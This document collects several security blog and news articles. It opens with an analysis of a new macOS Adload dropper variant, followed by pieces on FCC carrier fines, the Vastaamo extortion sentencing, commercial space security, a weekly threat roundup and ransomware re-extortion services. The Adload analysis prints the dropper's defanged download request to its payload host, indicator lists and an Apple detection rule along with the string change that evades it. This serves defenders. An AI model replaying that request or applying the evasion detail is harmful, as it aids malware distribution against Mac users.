macOS Adload | Prolific Adware Pivots Just Days After Apple’s XProtect Clampdown 

It’s been little more than a week since Apple rolled out an unprecedented 74 new rules to its XProtect malware signature list in version 2192. A further 10 rules were appended in version 2193 on April 30th. Cupertino’s security team were clearly hoping that a concerted effort would serve to disrupt prolific adware distributor Adload’s assault on macOS devices. Those behind the adware, however, appear to have pivoted quickly as dozens of new Adload samples are already appearing that evade Apple’s new signatures.

In this post, we take a look at one variant of these new samples that is almost entirely undetected on VirusTotal at this time. We hope this exposure will both help inform security teams looking to keep adware nuisances out of their environment and serve to boost detection recognition across other vendor engines.

Apple’s Massive Adload Signature Update

With XProtect version 2192, Apple added 74 new rules to XProtect.yara. While a few of these were targeted at other malware and adware distributors, the vast majority targeted adware widely known as Adload.

To put this update in context, prior to version 2192, XProtect had a total of 207 rules, with around two dozen targeting historical versions of Adload. With 2192, the rule count – taking into account both additions and removals – went up to 279, and then 289 with XProtect v2193.

While a few hundred malware rules pales in comparison to the efforts of external security vendors, who tend to have thousands if not tens of thousands of rules as well as behavioral and machine learning engines, an increase of 24% in one update represents a considerable amount of effort. Each rule has to be researched and thoroughly tested to ensure it will not cause false positives – catch innocent programs in its attempt to block malicious ones.

That undertaking would have been ongoing for quite some time and Apple would have hoped that the final result would cause the adware distributor to experience major disruption. No one would expect such actors to just give up and go home – not when there’s significant amounts of money to be made – but it must have been hoped that it would take some time for the malware authors to reconstruct their codebase.

Not so, as it turns out. We began observing new versions of Adload that evade XProtect’s new signatures during last week. Many of these were still widely detected by vendor engines, but by the weekend we were seeing Adload samples that were bypassing both XProtect and other vendors’ engines on VirusTotal.

Adload bypass detection
New Adload samples (VirusTotal)

The XProtect update on the last day of April, v2193, did not address these changes to Adload, instead targeting other prolific adware distributors Pirrit and Bundlore.

New Adload Go Variant (Rload/Lador)

Of the new Adload variants that we have seen, one consistently showed up as having 0 or only 1 detection among VirusTotal engines. This variant has a file size of 4.55MB and is compiled solely for Intel x86_64 architecture. The binaries function as initial droppers for the next stage payload.

None of the early samples we saw this week showed relationships to a parent executable, application or disk image, and none were codesigned, leaving the specific distribution methods obscure, though typically these droppers are embedded in cracked or trojanized apps distributed by malicious websites, torrents and other means. However, all the new samples embedded a unique custom domain registered with NameCheap and following known Adload patterns.

SHA1 Domain
13312b3dad9633fa185351e28397c21415d95125 api[.]deployquest[.]com
21c447cac1c13a6804e52f216a4c41a20c963c01 api[.]searchwebmesh[.]com
5b1d60c6f461cd8ba91cbca5c7190f4b2752979d api[.]generalmodules[.]com
67a56aa269b9301981c0538ace75bec2cd381656 api[.]validexplorer[.]com
7aaff54d2d6e3f38e51a4f084e17b9aad79a9de0 api[.]operativeeng[.]com
912a2ab06d3afe89e8e2ad19d3300055f0e0a968 api[.]buffermanager[.]com
a99d03fc3b32742de6688274a3ee3cdaef0172bf api[.]lookwebresults[.]com
f166eb63162ce4a5ac169e01c160be98b0e27e13 api[.]navigationbuffer[.]com
feb2c674f135410c3ced05c301f19ab461e37b20 api[.]inetprogress[.]com

On execution, the droppers perform system information discovery (T1082) via the ioreg utility:

ioreg -rd1 -c IOPlatformExpertDevice

The malware then seeks to resolve a hardcoded domain name sym._main.dwnldUrl and send an http request to retrieve a remote gzip.

Adload DNS domain URL
Hardcoded Adload domain
headers = Host: api[.]operativeeng[.]com, User-agent: Go-http-client/1.1, Accept-encoding: gzip, url = http[:]//api.operativeeng[.]com/ga?a=1104&b=E5282DF2-04D7-C854-BD9C-9B4A98F26EDC

The dropper writes the response to a subdirectory in /tmp/. The subdirectory name takes the form of /tmp/[0-9]{10}. If the remote server does not return a compressed archive, the subdirectory will contain an HTML 404 response.

Minor Tweak Evades XProtect Signature Rule

Looking at the binaries from a static point of view, there are a number of interesting artifacts. These binaries use an external (and legitimate) Go package to determine the machine’s unique ID.

The function that utilizes this package also calls another function to shell out commands, namely sym._os_exec.Command. Although Apple has targeted both of these artifacts in its signatures, the malware still evades detection by XProtect. The rule in XProtect.yara responsible for protecting Mac devices against these adware droppers is as follows:

rule macos_smolgolf_adload_dropper
{
meta:
    description = "MACOS.ADLOAD"
strings:
    $varName = "main.DownloadURL"
    $libraryName = "github.com/denisbrodbeck/machineid.ID"
    $execCommand = "os/exec.Command"
condition:
    Macho and all of them
}

However, the rule misses the latest samples as the authors have replaced the required string main.DownloadURL with main.dwnldUrl.

SentinelOne Detects Adload

These and many other Adload samples are, however, detected by SentinelOne Singularity. Our multi-engine, defense-in-depth platform uses a combination of static and dynamic engines to ensure the highest level of protection.

While we hope that Apple will quickly update its signatures to take into account this latest Adload pivot, it is inevitable that with XProtect’s YARA rules being transparent to malware developers it won’t take long for any such change to once again be circumvented.

Enterprises are advised to use a third party security solution such as SentinelOne Singularity to ensure that devices are protected against this and other threats targeting macOS devices in the fleet.

To learn more about how SentinelOne can help protect your organization, contact us or request a free demo.

Indicators of Compromise

File Hashes (SHA1)

13312b3dad9633fa185351e28397c21415d95125
21c447cac1c13a6804e52f216a4c41a20c963c01
5b1d60c6f461cd8ba91cbca5c7190f4b2752979d
67a56aa269b9301981c0538ace75bec2cd381656
7aaff54d2d6e3f38e51a4f084e17b9aad79a9de0
912a2ab06d3afe89e8e2ad19d3300055f0e0a968
a99d03fc3b32742de6688274a3ee3cdaef0172bf
f166eb63162ce4a5ac169e01c160be98b0e27e13
feb2c674f135410c3ced05c301f19ab461e37b20

Domains

api[.]buffermanager[.]com
api[.]deployquest[.]com.
api[.]generalmodules[.]com
api[.]inetprogress[.]com
api[.]lookwebresults[.]com
api[.]navigationbuffer[.]com
api[.]operativeeng[.]com
api[.]searchwebmesh[.]com
api[.]validexplorer[.]com

SentinelOne Singularity XDR
See how SentinelOne XDR provides end-to-end enterprise visibility, powerful analytics, and automated response across your complete technology stack.

FCC Fines Major U.S. Wireless Carriers for Selling Customer Location Data

The U.S. Federal Communications Commission (FCC) today levied fines totaling nearly $200 million against the four major carriers — including AT&T, Sprint, T-Mobile and Verizon — for illegally sharing access to customers’ location information without consent.

The fines mark the culmination of a more than four-year investigation into the actions of the major carriers. In February 2020, the FCC put all four wireless providers on notice that their practices of sharing access to customer location data were likely violating the law.

The FCC said it found the carriers each sold access to its customers’ location information to ‘aggregators,’ who then resold access to the information to third-party location-based service providers.

“In doing so, each carrier attempted to offload its obligations to obtain customer consent onto downstream recipients of location information, which in many instances meant that no valid customer consent was obtained,” an FCC statement on the action reads. “This initial failure was compounded when, after becoming aware that their safeguards were ineffective, the carriers continued to sell access to location information without taking reasonable measures to protect it from unauthorized access.”

The FCC’s findings against AT&T, for example, show that AT&T sold customer location data directly or indirectly to at least 88 third-party entities. The FCC found Verizon sold access to customer location data (indirectly or directly) to 67 third-party entities. Location data for Sprint customers found its way to 86 third-party entities, and to 75 third-parties in the case of T-Mobile customers.

The commission said it took action after Sen. Ron Wyden (D-Ore.) sent a letter to the FCC detailing how a company called Securus Technologies had been selling location data on customers of virtually any major mobile provider to law enforcement officials.

That same month, KrebsOnSecurity broke the news that LocationSmart — a data aggregation firm working with the major wireless carriers — had a free, unsecured demo of its service online that anyone could abuse to find the near-exact location of virtually any mobile phone in North America.

The carriers promised to “wind down” location data sharing agreements with third-party companies. But in 2019, reporting at Vice.com showed that little had changed, detailing how reporters were able to locate a test phone after paying $300 to a bounty hunter who simply bought the data through a little-known third-party service.

Sen. Wyden said no one who signed up for a cell plan thought they were giving permission for their phone company to sell a detailed record of their movements to anyone with a credit card.

“I applaud the FCC for following through on my investigation and holding these companies accountable for putting customers’ lives and privacy at risk,” Wyden said in a statement today.

The FCC fined Sprint and T-Mobile $12 million and $80 million respectively. AT&T was fined more than $57 million, while Verizon received a $47 million penalty. Still, these fines represent a tiny fraction of each carrier’s annual revenues. For example, $47 million is less than one percent of Verizon’s total wireless service revenue in 2023, which was nearly $77 billion.

The fine amounts vary because they were calculated based in part on the number of days that the carriers continued sharing customer location data after being notified that doing so was illegal (the agency also considered the number of active third-party location data sharing agreements). The FCC notes that AT&T and Verizon each took more than 320 days from the publication of the Times story to wind down their data sharing agreements; T-Mobile took 275 days; Sprint kept sharing customer location data for 386 days.

Update, 6:25 p.m. ET: Clarified that the FCC launched its investigation at the request of Sen. Wyden.

Man Who Mass-Extorted Psychotherapy Patients Gets Six Years

A 26-year-old Finnish man was sentenced to more than six years in prison today after being convicted of hacking into an online psychotherapy clinic, leaking tens of thousands of patient therapy records, and attempting to extort the clinic and patients.

On October 21, 2020, the Vastaamo Psychotherapy Center in Finland became the target of blackmail when a tormentor identified as “ransom_man” demanded payment of 40 bitcoins (~450,000 euros at the time) in return for a promise not to publish highly sensitive therapy session notes Vastaamo had exposed online.

Ransom_man announced on the dark web that he would start publishing 100 patient profiles every 24 hours. When Vastaamo declined to pay, ransom_man shifted to extorting individual patients. According to Finnish police, some 22,000 victims reported extortion attempts targeting them personally, targeted emails that threatened to publish their therapy notes online unless paid a 500 euro ransom.

Finnish prosecutors quickly zeroed in on a suspect: Julius “Zeekill” Kivimäki, a notorious criminal hacker convicted of committing tens of thousands of cybercrimes before he became an adult. After being charged with the attack in October 2022, Kivimäki fled the country. He was arrested four months later in France, hiding out under an assumed name and passport.

Antti Kurittu is a former criminal investigator who worked on an investigation involving Kivimäki’s use of the Zbot botnet, among other activities Kivimäki engaged in as a member of the hacker group Hack the Planet (HTP).

Kurittu said the prosecution had demanded at least seven years in jail, and that the sentence handed down was six years and three months. Kurittu said prosecutors knocked a few months off of Kivimäki’s sentence because he agreed to pay compensation to his victims, and that Kivimäki will remain in prison during any appeal process.

“I think the sentencing was as expected, knowing the Finnish judicial system,” Kurittu told KrebsOnSecurity. “As Kivimäki has not been sentenced to a non-suspended prison sentence during the last five years, he will be treated as a first-timer, his previous convictions notwithstanding.”

But because juvenile convictions in Finland don’t count towards determining whether somebody is a first-time offender, Kivimäki will end up serving approximately half of his sentence.

“This seems like a short sentence when taking into account the gravity of his actions and the life-altering consequences to thousands of people, but it’s almost the maximum the law allows for,” Kurittu said.

Kivimäki initially gained notoriety as a self-professed member of the Lizard Squad, a mainly low-skilled hacker group that specialized in DDoS attacks. But American and Finnish investigators say Kivimäki’s involvement in cybercrime dates back to at least 2008, when he was introduced to a founding member of what would soon become HTP.

Finnish police said Kivimäki also used the nicknames “Ryan”, “RyanC” and “Ryan Cleary” (Ryan Cleary was actually a member of a rival hacker group — LulzSec — who was sentenced to prison for hacking).

Kivimäki and other HTP members were involved in mass-compromising web servers using known vulnerabilities, and by 2012 Kivimäki’s alias Ryan Cleary was selling access to those servers in the form of a DDoS-for-hire service. Kivimäki was 15 years old at the time.

In 2013, investigators going through devices seized from Kivimäki found computer code that had been used to crack more than 60,000 web servers using a previously unknown vulnerability in Adobe’s ColdFusion software. KrebsOnSecurity detailed the work of HTP in September 2013, after the group compromised servers inside data brokers LexisNexis, Kroll, and Dun & Bradstreet.

The group used the same ColdFusion flaws to break into the National White Collar Crime Center (NWC3), a non-profit that provides research and investigative support to the U.S. Federal Bureau of Investigation (FBI).

As KrebsOnSecurity reported at the time, this small ColdFusion botnet of data broker servers was being controlled by the same cybercriminals who’d assumed control over SSNDOB, which operated one of the underground’s most reliable services for obtaining Social Security Number, dates of birth and credit file information on U.S. residents.

Kivimäki was responsible for making an August 2014 bomb threat against former Sony Online Entertainment President John Smedley that grounded an American Airlines plane. Kivimäki also was involved in calling in multiple fake bomb threats and “swatting” incidents — reporting fake hostage situations at an address to prompt a heavily armed police response to that location.

Ville Tapio, the former CEO of Vastaamo, was fired and also prosecuted following the breach. Ransom_man bragged about Vastaamo’s sloppy security, noting the company had used the laughably weak username and password “root/root” to protect sensitive patient records.

Investigators later found Vastaamo had originally been hacked in 2018 and again in 2019, but that Tapio never told anyone about the intrusions until ransom_man began his extortion spree. In April 2023, a Finnish court handed down a three-month sentence for Tapio, but that sentence was suspended because he had no previous criminal record.

PinnacleOne ExecBrief | Commercial Industry in Contested “Space”

Last week, PinnacleOne examined the state of aviation cybersecurity given recent incidents and federal action.

This week, we boost our view into orbit and dive into the intersection of cybersecurity and geopolitical risk facing the rapidly expanding space economy.

Please subscribe to read future issues — and forward this newsletter to interested colleagues.

Contact us directly with any comments or questions: pinnacleone-info@sentinelone.com

Insight Focus: Commercial Industry in Contested “Space”

In early April, the United States Space Force (USSF) released their first Commercial Space Strategy, embarking on a major shift in its approach to space operations, one that recognizes the pivotal role of the private sector in driving innovation. This USSF move to integrate commercial space solutions into “hybrid architectures” will raise critical issues of “dual-use capabilities” facing cyber and counterspace threats from China and Russia across peacetime, crisis, and conflict.

The space economy is projected to expand rapidly alongside intensifying national competition and great power rivalry. (Source: McKinsey/WEF)

This strategic shift is not just about leveraging commercial space capabilities, but also about managing the inherent cyber and interdependent risks that come with relying on private sector systems. The specter of cyberattacks on commercial space systems, with the potential for cascading impacts on military operations and the broader economy, looms large in this equation, even as the space economy is projected to reach $1.8T in value in the next 10 years.

Rapid innovations like SpaceX’s Starlink and Starshield, and other advanced orbital systems servicing an emerging commercial space economy present a double-edged sword for the USSF:

  • Opportunities to enhance capabilities and resilience in peacetime, while
  • Ensuring security and interoperability in crisis or conflict.

Investments by the U.S. and China in intelligence, tactical, and strategic platforms will drive most of the state-directed activity, but commercial and scientific activity will also accelerate as more nations get into the space game. Just in the last decade, the United Arab Emirates, for example, created a space agency, put an astronaut on the International Space Station (as did Saudi Arabia), sent a probe to Mars, and is collaborating with NASA on the lunar Artemis program.

Security Implications of Dual-Use Commercial Space Capabilities

One of the most significant challenges lies in the inherent ambiguity of dual-use space tech: capabilities developed for benign purposes (e.g., on-orbit satellite rendezvous) could also be used for military operations (e.g., tactical recon in a crisis or offensive operations in conflict). This blurs the lines between commercial and military applications and creates legal and ethical quandaries in a fast growing strategic industry mixed with large legacy government contractors and “deep tech” commercial startups desperate for product-market fit and sustainable business models.

The evolving risks in the space domain, starkly illustrated by Russia’s nuclear ASAT system and China’s growing space capabilities, underscore the paramount importance of robust Space Domain Awareness (SDA) and resilient architectures that give the U.S. warfighter an advantage in a contested environment. Chinese or Russian cyberattacks on US commercial satellites could disrupt military operations in crisis or conflict, with broad-scale and cascading commercial and economic effects on the ground.

The USSF’s approach to hardening immature startups is key, given the latter’s tight budget constraints and financial imperative to grow first, secure later. Space assets are of high value (to both their owners, customers, AND their attackers) but are deployed by businesses that require high capital investment and run on thin margins. This combination presents a real problem for DoD’s Commercial Space Strategy. This issue is of critical importance not only to firms in the space industry but also to those in cybersecurity and the vast array of businesses and sectors that depend on both – which, in today’s interconnected world, is essentially everyone.

The DoD has had ongoing challenges rolling out updated cybersecurity requirements for contractors, announcing plans for a revised “Cybersecurity Maturity Model Certification 2.0” program more than two years after it delayed an initial CMMC rule in late 2020. It may finally finalize the rule by the end of 2024 and requirements will waterfall down to all defense contractors soon after. Meanwhile, the USSF has already pushed out cybersecurity requirements that go beyond what CMMC requires, so space force contractors will have to comply with both.

Crisis and Conflict in Space

In a conflict scenario, the risk of kinetic or cyber attacks on U.S. commercial satellites is magnified. Balancing risk-sharing between USSF and the industry in peacetime is critical for resilience in war, as is the expectation setting for reciprocity, indemnification, and restitution.

In fact, the Space Force expected to begin identifying members of its newly formed Commercial Augmentation Space Reserve (CASR) by 2025 (the equivalent of DoD’s Civil Reserve Air Fleet for aviation and the Maritime Administration’s National Defense Reserve Fleet), focusing on space domain awareness, satellite communications and intelligence, surveillance and reconnaissance.

However, a critical distinction from the aviation and maritime domains is that, in the space domain, the second it’s known that a commercial platform is supporting a military mission, they become a target. Even membership of such a Reserve program will likely raise the risk profile for participating firms, given the pervasiveness of the threat environment in space. For example, PinnacleOne has advised participants in the CRAF that they are likely a target of Chinese military hacking groups tasked with executing disruptive or destructive attacks in a crisis or conflict.

The Space Force is moving quickly to embed strong contractual requirements for cybersecurity and operational reliability, but has yet to issue a formal construct for sharing relevant threat information with CASR members. Also, it is an open question if and how US Space Command (SPACECOM) would protect and defend commercial space assets if attacked.

Commercial Risk Management in Space

The USSF’s strategic principles provide a guiding framework for its peacetime efforts:

  • Balance
  • Interoperability
  • Resilience
  • Responsibility

However, significant obstacles remain in the face of near-peer competitor threats that could emerge in a crisis. The ambiguity of crisis conditions will stretch gaps in existing doctrine and operational collaboration. The lines of effort outlined in the strategy serve as important signposts in peacetime:

  • Transparency
  • Integration
  • Risk management
  • Securing the future

The true test, though, will come in addressing the counterspace and cyber capabilities of China and Russia in a conflict scenario, particularly for priority missions. This is already a challenge in terrestrial cyber operational collaboration between the public and private sectors, with issues relating to information sharing, overclassification, and tactical coordination and deconfliction.

The USSF faces a daunting challenge in leveraging commercial technologies in peacetime while managing the risks inherent in relying on private systems in a contested domain during conflict. Wargaming exercises that integrate commercial partners and red team simulations – at both the level of operational/tactical peers and government and enterprise leadership – will be vital in preparing for these eventualities.

A Strategic Shift

The shift to a model of consuming commercial solutions represents a seismic philosophical change for the USSF, given its history of using legacy primes developing cost-plus platforms “behind the Green Door” of special access program secrecy. Navigating the complexities of great power competition in peacetime while mitigating the risks of over-dependence on potentially vulnerable systems in conflict will require a delicate balancing act.

The integration of commercial solutions into hybrid architectures offers the promise of enhanced resilience in peacetime. However, it also expands the potential attack surface in a crisis or conflict scenario. The USSF’s approach to setting robust cybersecurity standards and collaborating closely with commercial partners to secure networks will be critical to managing these risks.

Ultimately, the success of the USSF Commercial Space Strategy will hinge on the ability to artfully manage the intricacies of commercial-military integration in peacetime while being prepared to counter the multi-dimensional threats posed by China and Russia in a crisis or conflict situation. The stakes could not be higher, as the outcome will have far-reaching implications for U.S. space superiority in an increasingly contested domain.

High Risk, High Reward

As the USSF navigates this uncharted territory, it will need to be agile, adaptive, and proactive in its approach. Balancing the imperatives of leveraging commercial innovation, ensuring security and resilience, and maintaining a decisive edge over near-peer competitors will require a level of strategic finesse unprecedented in the history of military space operations.

The Commercial Space Strategy represents a bold vision for the future of the USSF. Its success will depend on the ability to harness the immense potential of the private sector while mitigating the inherent risks and challenges. As the USSF embarks on this journey, it will need to be guided by a clear-eyed understanding of the strategic landscape and an unwavering commitment to maintaining U.S. space superiority in the face of an uncertain and contested future.

The Good, the Bad and the Ugly in Cybersecurity – Week 17

The Good | U.S. Govt Sends Spyware Abusers, Cybercriminals, and Crypto Launderers to Court

The U.S. government this week took three decisive actions against cyber criminals: a visa ban on thirteen spyware makers and sellers, sanctions against four Iranian nationals for their roles in recent cyberattacks, and an official charge for two cryptomixers.

Following the February announcement to set visa restrictions on commercial spyware developers and vendors, the Department of State has cracked down on the first thirteen individuals and their families. Excluding visa applications in this case effectively bans those who are linked to such operations from entering the U.S. The abuse of spyware has been a rising issue in recent years as adversaries use it to target persons of interest such as journalists, human rights advocates, academics, and government employees.

Two front companies and four individuals were sanctioned by the U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) for their association to cyber activities supporting the Iranian Islamic Revolutionary Guard Corps Cyber Electronic Command (IRGC-CEC) over the span of five years. Collectively, the identified threat actors have targeted over a dozen U.S. organizations, including the U.S. government and defense contractors through spear phishing and malware attacks, compromising over 200,000 employee accounts.

Responsible for processing more than $2 billion in ill-got funds for various criminal enterprises over nine years, two individuals have been charged by the Department of Justice for money laundering and operating an unlicensed money-transmitting business. Their services ‘Samourai’ and ‘Ricochet’ allowed criminals to sidestep law enforcement and hinder crypto exchanges from tracking the illegal source of the funds. Such services often provide a haven for criminals who require large-scale laundering efforts and evasion from sanctions.

The Bad | Nation-State Actors Breach MITRE Research Center via Ivanti Zero-Days

MITRE Corporation disclosed a breach of their systems this week after threat actors chained two Ivanti zero-day vulnerabilities together in the attack. The breach was discovered in January when suspicious activity was found on MITRE’s unclassified prototyping network, Network Experimentation Research and Virtualization Environment (NERVE). MITRE’s research and development centers employ the nation’s leading scientists and engineers, building digital solutions for military, security, and intelligence organizations across the U.S.

After containing the incident, MITRE stated that affected parties were properly informed and relevant authorities engaged, with current efforts focused on restoring operations. Ongoing investigations show that the core network and partner systems were unaffected by the intrusion.

The threat actors compromised the non-profit’s VPNs by exploiting two Ivanti Connect Secure zero-days: an authentication bypass flaw tracked as CVE-2023-46805 (CVSS 8.2) and CVE-2024-21887 (CVSS 9.1), a command injection flaw. Together, they allowed the attacker to use session hijacking to bypass multi-factor authentication (MFA) measures and move laterally through the network’s VMware infrastructure with an administrative account. Forensics also show the actors employing a combination of webshells and backdoors to establish persistence and harvest credentials.

The breach is suspected to be the work of state-sponsored threat actors and serves as a striking reminder that even cutting edge and highly-funded organizations are not immune from cyber threats. Targets on the level of NERVE, which in this case houses invaluable information on experimental methodologies and technologies, continue to be extremely lucrative for nation-state adversaries looking to either potentially steal or sabotage sensitive resources.

MITRE has released tactics, techniques, and procedures (TTPs) related to the breach in effort to spread lessons learned within the infosec community. CISA has also shared technical details and IoCs in a recent advisory.

Source: MITRE Corporation

The Ugly | GRU-Based APT Exploits Old Windows Flaw with New GooseEgg Tool to Target Government Entities

Despite being patched back in October 2022, a Windows Print Spooler vulnerability tracked as CVE-2022-38028 (CVSS 7.8) has made its way back into headlines this week. This time weaponized by GRU-linked threat group APT28 (aka Forest Blizzard or Strontium), the flaw delivers a previously unknown custom malware dubbed ‘GooseEgg’ to perform a slew of post-compromise activities.

GooseEgg has been leveraged possibly as early as April 2019 and has now been observed in attacks targeting North American, Western European, and Ukrainian governments, non-profit organizations, educational institutions, and transportation entities.

Typically, GooseEgg is deployed with a batch script named either execute.bat and doit.bat, which triggers the executable and sets up persistence in the form of a scheduled task designed to run servtask.bat. The malware tool works by enabling the deployment of a malicious DLL (usually containing wayzgoose) capable of spawning other applications with SYSTEM-level permissions that allow attackers to perform remote code execution (RCE), backdoor installations, and lateral movement.

Source: Microsoft

APT28 is often known to use publicly available exploits alongside this Windows Print Spooler flaw, including CVE-2023-23397 and the PrintNightmare vulnerabilities tracked as CVE-2021-34527 and CVE-2021-1675. Researchers note that APT28 deploys GooseEgg to enable checking exploit success, customer version identification, and privilege escalation – all in support of their main objective to steal credentials and maintain access on the compromised target.

Advanced and well-resourced threat groups like APT28 continually refine their approach, testing new and custom malware and techniques to avoid attribution. CISA has since added CVE-2022-38028 to its KEV catalog and urged federal agencies to identify any systems vulnerable to the flaw and apply the available patch.

Ransomware Evolution | How Cheated Affiliates Are Recycling Victim Data for Profit

Threat actors consistently alter and develop their schemes in order to further escalate their payoffs. In a new trend, ransomware affiliates are actively re-monetizing stolen data outside of their original RaaS agreements, especially as financial squabbles between threat actors emerge in the ransomware economy. The affiliates in such instances are starting to work with third-parties or external data leak services in order to re-extort victims who have already paid the ransom to the original attackers.

This blog post examines how affiliate attackers are embracing this new third-party extortion method, illustrated most recently by the ostensibly back-to-back cyberattacks on Change Healthcare and the emergence of services like RansomHub and Dispossessor.

ALPHV Exit Scam & Re-Extortion by RansomHub

In February 2024, a subsidiary of healthcare giant UnitedHealth Group (UHG) was forced to take down its IT systems and various services. The root of the disruption was a cyberattack by a BlackCat (aka ALPHV) affiliate on Change Healthcare, a healthcare technology platform used by the subsidiary.

Post-attack, ALPHV ransomware operators reportedly took down their data leak blog, servers, and operation negotiation sites, and failed to pay the affiliate their agreed share of the ransom.

Purportedly, Change Healthcare paid out the $22 million ransom demand, only to be targeted a second time just weeks after recovering from the initial attack. This time around, the ransomware attack was claimed by a threat actor working in conjunction with RansomHub, a new extortion group claiming to hold 4 terabytes of the victim’s sensitive data including personally identifiable information (PII) of active U.S. military personnel, patient records, and payment information.

It is believed that after ALPHV reneged on their payment, the affiliate partnered with RansomHub and re-used the data stolen from the initial attack in order to secure a pay off. At the time of writing, Change Healthcare has been removed from RansomHub’s DLS on April, 20, 2024, presumably due to payment and cooperation with the threat actors.

RansomHub and Change Healthcare Posting
RansomHub and Change Healthcare Posting

RansomHub RaaS

RansomHub emerged in early February 2024 with a simple data leak site (DLS). Their focus mirrors other historically well-known operations such as REvil, ALPHV, and Play with regards to their core values and overall mission statements.

Standard RansomHub ransom note
Standard RansomHub ransom note

RansomHub operates as a ransomware-as-a-service (RaaS), partnering with affiliates that work with a variety of ransomware families, including ALPHV and LockBit. Notably, RansomHub works with other threat actors and groups to republish and rebroadcast the availability of victim data. There are multiple, revolving Telegram groups dedicated to amplifying the reach of RansomHub’s leaks. An example of this is the “R3dd1sh_34_E4gl3_D4t4l34ks” channel (aka Reddish Eagle Dataleaks).

RandomHub archive amplified by R3dd1sh_34_E4gl3_D4t4l34ks
RandomHub archive amplified by R3dd1sh_34_E4gl3_D4t4l34ks

This development means that the data leak sites (DLSs) usually associated with a particular threat actor are no longer the only avenue of exposure for ransomware victims. Downstream amplification of these leaks is now common and generally open to all non-private Telegram or Discord groups.

Interestingly, according to RansomHub’s own “rules”, it does not allow:

  • Affiliates to attack entities in the Commonwealth of Independent States (CIS), Cuba, China, Romania, or North Korea,
  • Re-attacks for targeted companies that have already made payment, nor
  • Attacks against non-profit organizations.
Original RansomHub About Page
Original RansomHub About Page

However, given the current situation faced by Change Healthcare, the second bullet in the list above appears to be a gray area, especially if re-extorting ransomware victims constitutes an attack.

Our research indicates that multiple affiliates are now partnering with RansomHub in an effort to regain profitability following the apparent collapse of ALPHV.

Dispossessor Data Leak Blog

Dispossessor emerged in February of 2024, advertising the availability of previously-leaked data for download and potential sale. These announcements were placed across multiple forums and markets, including BreachForums and XSS.

Dispossessor announcement on Breachforums (LockBit data)
Dispossessor announcement on Breachforums (LockBit data)

The X account @ransomfeednews recently posted regarding this new group, presenting their findings that indicated how Dispossessor “is not ransomware, but a group of scoundrels trying to monetize (on nothing) using the claims of other groups.” The group is also active in Telegram, posting similar announcements across well-trafficked Telegram channels.

Dispossessor initially announced the renewed availability of the data from some 330 LockBit victims. This was claimed to be reposted data from previously available LockBit victims, now hosted on Dispossessor’s network and thus not subject to LockBit’s availability restrictions.

Dispossessor Blog
Dispossessor Blog

Dispossessor appears to be reposting data previously associated with other operations with examples ranging from Cl0p, Hunters International, and 8base. We are aware of at least a dozen victims listed on Dispossessor that have also been previously listed by other groups.

In addition, there are apparent links to other aggregate-style operators like Snatch.

Dispossessor Blog with Snatch links highlighted
Dispossessor Blog with Snatch links highlighted

In many cases, the Dispossessor page links to the Dispossessor-Cloud repository. One victim was originally on CL0P’s data leak site in early 2023. Dispossessor’s data is identical to that hosted in the original CL0P magnet links for this and other victims.

Rabbit Hole Data Leak Site (DLS)

A third emerging service with potential to contribute to the expansion of monetization of previously leaked victim data is Rabbit Hole DLS, first observed on March 13, 2024. In an English translation of the site’s About Page, Rabbit Hole is described as a leaks “blog for small and medium-sized teams that do not have their own website”. The site is currently promoted in forums and dark markets.

Translated Rabbit Hole Blog announcement
Translated Rabbit Hole Blog announcement

Original Postings (RU):
блог для малых и средних команд у которых нет своего сайта

кроличья нора не является рансом группой, это общий блог для малых и средних команд. данный блог создан в целях оказания давления на корпорации, за счет большого количества публикаций разных команд — кроличья нора предлагает вам пристанище, где вы можете опубликовать любую утечку [гос учреждения и больницы являются исключением]

Original Postings (EN):
blog for small and medium-sized teams that do not have their own website

rabbit hole is not a ransom group, it is a general blog for small to medium sized teams. this blog was created in order to put pressure on corporations, due to the large number of publications from different teams – the rabbit hole offers you a haven where you can publish any leak [government institutions and hospitals are an exception]

Once a threat actor creates a Rabbit Hole account, victim leaks can be added, updated, and managed through its web portal. Each account manages their leaks through what is referred to as a ‘cabinet’ within the Rabbit Hole blog interface.

Rabbit Hole Blog Account “Cabinet”
Rabbit Hole Blog Account “Cabinet”

When posting leak data, the user is able to supply information including who they are and who the victim is such as the name of the company, URL, company description, publish date/deadline, any associated images, and additional text to be included with the public leak description upon publication. The download URL for associated leaked data is also supplied via this interface.

New Leak creation on Rabbit Hole Blog
New Leak creation on Rabbit Hole Blog

Once all details have been provided, they are submitted to higher level owners and managers of the Rabbit Hole blog. Moderators are then responsible for the ultimate public posting of the leak. The Rabbit Hole platform, ideal for emerging cybercriminals with little to no infrastructure or resources, could easily accommodate multiple small-time actors looking to monetize the same data leaks. We continue to monitor how this site develops.

Conclusion

As larger, established threat groups fold or re-brand, we can expect to see many affiliates cut out of pending payments. Since threat actors will hold onto exfiltrated data, the likelihood of that data being used to re-extort the victims is high and will continue to grow. While it may seem like common sense not to trust threat actors to hold up their end of a deal, the infosec community may continue to witness the fallout that happens when in-fighting and disagreements happen between cybercriminals as well as threat service providers and their affiliates.

The trust model upon which these RaaS agreements are created does not scale well, as most recently highlighted by security researchers monitoring the relationships between threat actors and affiliates in the ecosystem:

“Additionally, we saw a continuation of long-tailed data exfiltration defaults by threat actors in Q1, i.e., posting of information on a leak site after payment or “hostage trading” with other groups or individuals, which adds further evidence to the file on the lack of benefits to pay for suppressing a data leak or any confidence in a criminal actor keeping their word.”

As the ransomware and extortion landscape evolves, criminals will do what they need to do to protect their investments and paydays. Since affiliates carrying out a ransomware attack hold the actual data, they have the option to go elsewhere to monetize the data to collect payment. Organizations continue to be discouraged by global law enforcement agencies from paying ransoms when dealing with a cyberattack and to file a report with the IC3, contributing to greater cyber resilience to potential attacks.

Indicators

z5jixbfejdu5wtxd2baliu6hwzgcitlspnttr7c2eopl5ccfcjrhkqid[.]onion
ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd[.]onion
h6tejafqdkdltppzj7q34enltmfnpxaf7cseslv6djgiukiii573xtid[.]onion

dispossessor[.]com/
dispossessor-cloud[.]com/
205[.]209.102[.]218

tox[:]CE742906B254399832E4ED6EC1DDA50D7942F9A4F3F0FE46C19E1737FF29EF67DDAF3AB87B44
tox[:]36712626ED19B307ECB3E971AFDFAA449607100383DBE4C064CCD5909355D908AECCF6180CDA

actor:DISPOSSESSOR
actor:plzdbmagain1037
actor:ViDoK

Russian FSB Counterintelligence Chief Gets 9 Years in Cybercrime Bribery Scheme

